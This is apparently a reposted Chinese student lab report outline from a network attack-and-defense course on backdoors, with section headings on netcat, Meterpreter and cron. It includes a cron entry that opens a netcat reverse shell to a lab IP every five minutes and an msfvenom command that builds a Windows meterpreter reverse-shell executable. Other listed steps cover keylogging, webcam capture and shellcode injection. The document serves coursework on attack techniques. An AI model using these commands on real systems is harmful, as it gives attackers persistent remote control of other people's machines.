其他分享
首页 > 其他分享> > 2019-2020 网络对抗技术 20175207 Exp2 后门原理于实践

2019-2020 网络对抗技术 20175207 Exp2 后门原理于实践

作者:互联网

目录


1 相关概念

1.1 后门?

1.2 哪里有后门?


2 常用后门工具

2.1 NC/netcat

2.2 Meterpreter

2.3 corn


3 实验内容

3.1 使用netcat获取主机操作Shell,cron启动

crontab -e
*/5 * * * * /bin/netcat 192.168.137.133 8888 -e /bin/sh


五分钟后……

3.2 使用socat获取主机操作Shell,任务计划启动

3.3 使用 MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=8888 -f exe > 20175207_backdoor.exe

3.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

3.5 使用MSF生成shellcode,注入到实践1的pwn1中,获取反弹连接Shell

4 问题思考

5 实验中遇到的问题

标签:后门,exe,8888,Exp2,Linux,Shell,2020,主机,20175207
来源: https://www.cnblogs.com/ln-0407/p/12510696.html